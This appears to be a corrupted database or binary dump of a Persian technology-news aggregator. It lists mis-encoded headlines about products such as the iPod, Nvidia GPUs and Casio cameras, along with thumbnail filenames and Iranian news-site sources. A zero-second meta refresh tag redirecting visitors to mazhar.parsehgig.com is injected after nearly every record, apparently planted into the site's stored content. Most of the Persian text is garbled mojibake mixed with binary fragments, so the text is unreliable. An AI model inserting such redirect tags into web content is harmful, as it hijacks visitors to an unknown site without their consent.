iv="refresh" content="0;URL=http://mazhar.parsehgig.com">6J,2D`XJC iPod DE3 ~0J1 (touch-screen) (G 'FH'9 E.*DA ~.4 CFF/G G' EH3JB GE1'G 3'.* 41C* '~D '6'AG 4/G '3*.thumbnails_40/Steve_Jobs.jpgbbc.co.uk<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6G,Lv]UH( 3'J* D'H F* (G EF8H1 'J,'/ JC ('FC ,'E9 EB'D'* -BHB H (' G/A 1/ "H1 E7'D( H EB'D'* ~1'CF/G EH,H/ /1 4(CG ,G'F 'JF*1F* 1'G 'F/'2 4/G '3*.thumbnails_40/law.jpgwebna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6F,|\YCE~'F Nvidia (21*1JF *HDJ/ CFF/G J~3* G' 1'AJC (GPU) /1 /FJ' '9D'E C1/ B5/ /'1/ /1 'H'37 E'G FH'E(1 3'D ,'1 ("('F E'G) .7 *HDJ/ E-5HD'* .H/ 1' (' FEHFG G' ~J41A*G *1 ,'J2JF FE'J/.thumbnails_40/nvidia.gifwinbeta.net<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6<,R&RWGJ'* '2 71A C4H1 9E'F (41C* 9E'F *D) 1H2 04*G 3G 4F(G- (G 'J1'F "E/F/ *' (' FG'J 4/F *A'GE F'EG JC E3J1 C'(D AJ(1 FH1 (JF /H C4H1 C4J/G 4H/.thumbnails_40/fibrnoori.jpgcitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6:,DpP('2 4* E91HA *1JF ('2 *5HJ1 EH('JD. 1'G .H/ 1' '2 EJ'F G'1 9F51 -J'* J9F "( .'C ('/ H "*4 CG (G 5H1* 3G (9/ 916G 4/G '3* ~J/' CFJ/.thumbnails_40/snak.gifictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">69,,^lO41C* E'/J1'F *HDJ/ H4 G' *DAF GE1'G .H/ 1' (G /DJD "FG CG 'A2'J4 *91AG H'1/'* B79'* '2 30 /15/ (G 54 /15/ .H'F/G E*HBA C1/.thumbnails_40/madiran.gifitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">68,2HNCE~'F J'GH B/1* 1B'(* .H/ /1 915G *(DJ:'* "FD'JF 1' (' .1J/ 300 EJDJHF /D'1 41C* BlueLithium (G(H/ (.4J/.thumbnails_40/yahoo1.jpgwinbeta.net<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com"> \Gt n7` 4 3 66,8vL41C* Sprint Nextel (G 9FH'F ~J4'E /1 4(CG G' ('F/ H3J9 ( 3JE F3D G'1E (' EH*H1HD' 3'E3HF H 'JF*D (1' *H39G WiMax GEC'1 E CF/.thumbnails_40/Sprint_nextel.gifictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">65,PhK(JD J*3 (FJ'F0'1 E'JC1H3'A* /1 F813F, 1H2F'EG "JH '3 ' *H/" (G 9FH'F "E1/ (21 *'1J. /1 25 3'D 04*G" 'F*.'( 4/.thumbnails_40/bill_gates.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">61,pG41C* '~F "3'FJH" '9D'E C1/ CG 3(C *1JF H CHC*1JF /H1(JF AJDE(1/'1 /J,J*'D (' CJAJ* *5HJ1 ('D' /1 ,G'F 1' 3'.*G '3*.thumbnails_40/Sanyo_Xacti_DMX-HD_1000.jpgaftabnews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">60,rFFH2/GE 4G1JH1 E'G GE2E'F (' 1H2 ,G'F "'H~F 3H13" E *H'FJ/ CJ3 1'J'FG .H/ 1' (G ~'1C /'F4,H (1/G H JC '2 3J3*E 9'ED G' DJFHC3 (G F'E ""(HF*'" 1' (1 1H 1'J'FG .H/ (G 7H1 1'J'F F5( CFJ/. thumbnails_40/linux.gifirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6/,E41C* J'GH H,H/ JC FB5 'EFJ* -3'3 /1 (1F'EG ~1C'1(1/ "J'GHE3F,1" 1' *'JJ/ C1/.thumbnails_40/YahooMessenger.gifirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6-, pME/J1 9'ED ('FC ED 'J1'F A*: *H39G ./E'* 'DC*1HFJC /1 /3*H1 C'1 ('FC ED 'J1'F B1'1 /'1/.thumbnails_40/bmi.gifirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6+,Zn4(CG 1'J'FG G' "DH/G /1 '.*J'1 E,1E'F 'JF*1F* CG H1E '3*H1E *-* CF*1D "F G'3* (G -/ (21 4/G '3* CG 'CFHF B/1* ~1'CF/ "F (J4*1 '2 *E'E '(11'J'FG G' B/1*EF/ ,G'F '3*.thumbnails_40/z0709041.jpgisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6),lM41C* C'3JH '2 3'.* /H1(JF AHB E/1F A41/G 12 E'~JC3D .(1 /'/.thumbnails_40/Casio_Exilim_EX-Z1200.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6',*tj41C* "' ~" "E'/G 916G *,'1 /H *DAF GE1'G - 1'J'FG ,J( ,/J/ E,G2 (G 3J3*E 9'ED ,/J/ E'JC1H3'A* H '*5'D'* "JH 'E * '3" '3*. thumbnails_40/iPAQ-614c_iPAQ-914c.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6%,*hJC 41C* JF H4 *DAF GE1'G E/D ZhenZhou VII 1' (G 4CD 3AJFG A6'J (G ('2'1 '1'JG C1/.thumbnails_40/ZhenZhou_VII.jpgitiran.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6$,$Vnga41C* 3HF '9D'E C1/ CG /1 ('2'1 "E1JC' F3.G ,/J/ '2 H'CEF 1' 916G E CF/ CG *H'F'J ('2 *HDJ/ AJDE /1 A1E* /J,J*'D 1' /'1/.thumbnails_40/nzws615.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6#,J^f41C* E.'(1'* Noodle 'FDJ3 '9D'E C1/ CG (G C'1(1'F H E4*1C'F .H/ /1 '2' (1B1'1 *E'3 (' *DAF GE1'G ~HD ~1/'.* E CF/.thumbnails_40/noodle.gifitiran.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6!,8jxd(1 '3'3 JC *-BJB EF*41 4/G /1 E,DG 9DE FJH3'JF*J3* '3*A'/G '2 *DAF GE1'G (G E/* 7HD'F E *H'F/ .71 '(*D' (G 317'F 1' 'A2'J4 /G/.thumbnails_40/mobile3.jpgisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,a41C* Certicell CG ./E'* E1(H7 (G *9EJ1 H '1*B' *DAF G' GE1'G 1' 'F,'E E /G/ '9D'E C1/ CG (G ",H1, G'*2" FH,H'F F'(:G GC1 *DAF ""JAHF" (G 9FH'F ,'J2G JC E'4JF Nissan 350Z *9DB E J1/.thumbnails_40/George_Hotz.jpgwinbeta.net<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,`MJC 2F ('1/'1 /1 41B GF/ (' 'FA,'1 ('*1 *DAF GE1'G .H/ /'1 3H.* 4/.thumbnails_40/BLD-3.jpgisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">'F *DAF GE1'G EF*41 C1/.thumbnails_40/mobile2.jpgiranmobilenews.ir10 H4 ~1 A1H4 E'G 'C*(1 /1 ('2'1 ,G'F U:B lu` 5 O4 6,Bp"[_E,DG AH1(3 /1 2'14 EGE *1JF HJ1H3 G' 1'J'FG ' 1' CG /1 3'D '.J1 1'J'FG G' 4.5 1' /1 31'31 ,G'F EH1/ -EDG B1'1 /'/G 'F/ E91A C1/.thumbnails_40/virus.gifhamshahrionline.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,n>Z'/'F4'G 9DHE ~24C H ./E'* (G/'4* H /1E'F ,F/ 4'~H1 'GH'2 /H1G G' ('2"EH2 E1(H7 (G ,'E9G ~24C H ~J1'~24C 1' (G 5H1* 'DC*1HFJC '1'&G H '7D'9 13'F E CF/.thumbnails_40/z0709032.jpgisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,FZV`~DJ3 JF (21 *1JF (1F'EG CD'G(1/'1 G1E 'JF*1F* /1 'JF C4H1 1' CG 170 G2'1 FA1 /1 "F 41C* C1/G (H/F/ C4A C1/.thumbnails_40/z0709031.jpgeconews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,T`(J4 '2 * , G2'1 4E'1G *DAF ,/J/ +'(* 7 ~F, E'G 04*G 3'D,'1 /1 '3*'F *G1'F /'J1 4/G '3*. thumbnails_40/tci.gifirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,"P^S`/1 7HD GA*G 04*G (* , *' * , 4G1JH1E'G) (J4 '2 * , /15/ 1'J'FG G' 31'31 ,G'F (' H,H/ /'4*F F1E 'A2'1G' 'EFJ* A9'D H /1 -/H/ * , /15/ '2 "FG' (/HF /1 '.*J'1 /'4*F 3J3*E G' -A'8* EF'3( (' "DH/ G' H -ED'* F'4 '2 FAH0 C/G' E.1( EH',G 4/F/. thumbnails_40/virus.jpgirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,H~ R\C'14F'3'F 7 (J'FJG ' G4/'1 /'/F/ 'JF 1H2G' A9'DJ* G' GC1G' (G B/1 *H39G J'A*G CG '-*E'D E 1H/ "FG' (*H'FF/ 3.* 'A2'1G' 1' FJ2 "DH/G CFF/.thumbnails_40/black_hat.jpgeconews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,0RQ\'JF H4 '2 31 H4 G' Black Label 'D , (H/G H '2 E4.5'* CDJ/ "F 6.'E* *B1J(' 9/9 EJD E*1 "F '3*.thumbnails_40/lg_LC3600.jpghamvatansalam.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,O\"JJF F'EG ISDP H ISPG' ~3 '2 *5HJ( /1 CEJ3JHF *F8JE EB11'* H '1*('7'* (G 2H/ '5D'- E 4H/.thumbnails_40/cra.jpgcitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,T4M[41C* '3~'1CD JC '2 41C* G' E9*(1 *HDJ/CFF/G C'1* G' 1'AJC 31 ,/J/ C'1* G' 1'AJC .H/ (' F'E G' P860 HM P850 HM HP850+ HM 1' E91A FEH/.thumbnails_40/geforce.jpgshabakeh-mag.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,|,H'JF /H GF/2A1 B1'1 '3* (' F'E G' Nokia BH-903 CG 5/'G' 1' (G 5H1* '3*1HJH ~.4 E CF/ H Nokia BH-902 /1 ('2'1 916G 4HF/.thumbnails_40/nokia_bluetooth_headset_bh902.jpghamvatansalam.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,.FHE'JC1H3'A* 31'F,'E *5EJE 1A* ,2&J'* E1(H7 (G 916G 31HJ3 ~C 1 3J3*E 9'ED HJF/H2 HJ3*' 1' '9D'E CF/.thumbnails_40/vista-logo.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6, "HE*.55'F 41C* "C'3JH" '2 3'.* 31J9*1JF /H1(JF /J,J*'D ,G'F .(1 /'/F/.thumbnails_40/casio_6_megapixel_camera.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,Nf F'~D H AHDC3 H'F *5EJE 1A*G 'F/ (1' 916G F3D ,/J/ '2 .H/1HG' ~J41A*G CG ""- C'1" F'E /'1/ (' JC/J1 GEC'1 CFF/.thumbnails_40/apple_icar.jpgmehrnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,$p (G /F('D 'F*4'1 '.('1 ,/J/ '2 3H 41C* 3HF E(F (1 916G 3*1/G /J3C G' ,/J/ Blu-ray /1 E'G G' ('B E'F/G '2 3'D ,'1 EJD'/ C'14F'3'F '-*E'D E /GF/ 'JF 'E1 E *H'F/ -'CEJ* 3HF /1 A1H4 F3D ,/J/ DVDG' 1' '2 (JF ((1/.thumbnails_40/blu-ray.jpgitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,.<p JC 1HG -BHB (41 /1 "E1JC' '2 41C* 'JF*1F* "J'GH" (G /DJD "GE/3*" (' /HD* JF /1 4CF,G 'A1'/ 4C'J* C1/.thumbnails_40/yahoo1.jpgirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">#+V)Gf E X` 6 #5 6,(y +(* F'E '2 41C* G' E*B'6 (1' -6H1 /1 3J2/GEJF FE'J4'G (JF 'DEDD 'DC*1HFJC C'E~JH*1 H *,'1* 'DC*1HFJC CG /1 *'1J. 44E *' FGE "('F E'G ,'1 /1 E-D /'JE FE'J4'G G' (JF 'DEDD *G1'F (12'1 E 4H/ (' *.AJA HJG ":'2 4/.thumbnails_40/fair1.jpgisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,`Jp F.3*JF E1C2 /'/G (/J*'3F*1) 9DE C4H1 'E1H2 /H4F(G (' -6H1 "E-E/ EG/ 2'G/" H2J1 9DHE *-BJB'* H AF'H1 /1 3'2E'F ~HG4 G' 9DE H 5F9* 'J1'F 'A**'- 4/.thumbnails_40/mohammad_mehdi_zahedi.jpgirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:@irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,D+farsnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,@pitiran.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,<$ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:xisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:vitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,<tictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:q isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,: itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:o irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:iirna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:yitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,<yictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6y ,,,<citna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6v ,,,8 isnair<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6h ,,,@}econews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6d ,,,B{winbeta.net<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6^ ,,,:yisna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6N ,,,@NJeconews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6I ,,,<Êictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6G ,,,<0ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6; ,,,< ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6: ,,,<]ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">63 ,,,:.itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">62 ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6, ,,,@econews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6) ,,,Dfavanews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6' ,,,:isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6& ,,,Bwinbeta.net<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6$ ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6" ,,,Bmojnews.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,@ itiran.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">:i5l @qAvP * a +b` 7 '9y6 6 ,,,< ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,N hamvatansalam.com<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,: irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:[irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,< ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,< ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6,,,< ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,<citna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,@econews.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:ǔitna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,< Fictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,<ictna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 ,,,:isna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 } ,,,Fitobserver.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 } ,,,:itna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 } ,,,<citna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 } ,,,:irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 } ,,,: irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 | ,,,: irna.ir<meta http-equiv="refresh" content="0;URL=http://mazhar.parsehgig.com">6 | ,,,L jamejamonline.ir<meta http-eq